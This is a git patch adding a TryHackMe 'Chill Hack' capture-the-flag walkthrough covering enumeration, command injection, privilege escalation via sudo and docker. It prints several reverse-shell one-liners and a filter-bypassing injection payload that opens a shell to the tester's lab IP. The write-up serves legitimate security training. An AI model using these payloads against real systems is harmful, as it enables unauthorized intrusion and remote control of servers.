From aa80a99412d9a37969a8b2dc83c08acd05e422b1 Mon Sep 17 00:00:00 2001
From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Thu, 10 Dec 2020 00:32:57 +0500
Subject: [PATCH] Add files via upload
---
TryHackMe/Chill_Hack.md | 152 ++++++++++++++++++++++++++++++++++++++++
1 file changed, 152 insertions(+)
create mode 100644 TryHackMe/Chill_Hack.md
diff --git a/TryHackMe/Chill_Hack.md b/TryHackMe/Chill_Hack.md
new file mode 100644
index 0000000..0c7a1d6
--- /dev/null
+++ b/TryHackMe/Chill_Hack.md
@@ -0,0 +1,152 @@
+# TryHackMe-Chill Hack
+
+## NMAP
+
+```
+Nmap scan report for 10.10.244.249 [4/7]
+Host is up (0.41s latency).
+Not shown: 997 closed ports
+PORT STATE SERVICE VERSION
+21/tcp open ftp vsftpd 3.0.3
+| ftp-anon: Anonymous FTP login allowed (FTP code 230)
+|_-rw-r--r-- 1 1001 1001 90 Oct 03 04:33 note.txt
+| ftp-syst:
+| STAT:
+| FTP server status:
+| Connected to ::ffff:10.2.54.209
+| Logged in as ftp
+| TYPE: ASCII
+| No session bandwidth limit
+| Session timeout in seconds is 300
+| Control connection is plain text
+| Data connections will be plain text
+| At session startup, client count was 2
+| vsFTPd 3.0.3 - secure, fast, stable
+|_End of status
+22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
+| 256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
+|_ 256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
+80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: Game Info
+Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 68.20 seconds
+```
+
+## PORT 80
+
+
+
+## PORT 21
+
+We see from the nmap results that `anonymous` login on ftp is enabled ,
+
+
+
+
+We can only find a `note.txt` file
+
+
+
+```
+Anurodh told me that there is some filtering on strings being put in the command -- Apaar
+```
+By reading this we can assume that there are two users `anurodh` and `appar`.
+
+## Gobuster
+
+Let's do a directory brute force on the web page
+
+
+
+We are presented a page where we can input something and it's always good to try some system commands to check if there exists `RCE` (Remote Code Execution)
+
+So I'll try running a command `pwd` which will print the current working directory
+
+
+
+And it does work so let's try to input a reverse shell command so that we may get our intial foothold.But problem is that it's filtering the input so if we try to input something malicious it's going to filter that out like ruuning these reverse shells
+
+```
+bash -i >& /dev/tcp/10.2.54.209/2222 0>&1
+
+python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.54.209",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])
+
+ruby -rsocket -e'f=TCPSocket.open("10.2.54.209",2222).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
+
+nc -e /bin/sh 10.2.54.209 4444
+```
+
+But if we combine commands togther like
+
+`pwd;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.54.209 2222 >/tmp/f`
+
+
+
+We are in the box as `www-data`
+
+Running `sudo -l` will tell us that what we could run as other user or as root so in this case we run a file as user `apaar`
+
+
+Now before running it let's see what the script does
+
+
+
+So It's going to take two inputs first input `$person` would mean nothing it can be random string since it is only being printed another input `$msg` will goto a command `$msg 2>/dev/null` so we can try running a command like `cat local.txt` which is our user flag and it's going to redirect any output errors to null so basically we can run any command as user `apaar`
+
+
+
+Try running `/bin/sh` to see if it get a shell as `appar`
+
+
+
+Transfer `linpeas` on the box
+
+
+
+Running linepeas I didn't find much but saw that there are two ports on localhost 3306 which is `mysql` and `9001` which we can acess through ssh portforwarding
+
+Before doing that let's generate a public and private key for ssh for that use `ssh-keygen` then copy the contents of `id_rsa.pub` into `authorized_keys`
+
+
+
+`ssh -L 9001:localhost:9001 apaar@10.10.165.124 -i id_rsa`
+
+After doing that we can visit that port
+
+
+
+Let's visit `var/www`
+
+
+
+The step for ssh portforwarding wasn't needed as we could have just grab that picture or visted the page `/hacker.php` and it's uselsess to go for finding mysql username and password as it is just a rabbit hole I would say it was waste of time
+
+
+
+Anyway,
+
+
+
+
+
+And this archive is password protected so we have to use a password cracking tool , the one that I use is called `fcrackzip`
+
+
+
+On reading that extract source code file we can fine a base64 enconded text which could be a user password
+
+
+
+And we are now logged in as `anurodh` and we can see that this user is in the group of `docker`
+
+
+
+Looking at privilege escalation for docker on `GTFOBINS`
+
+
+
+We are root !!!
\ No newline at end of file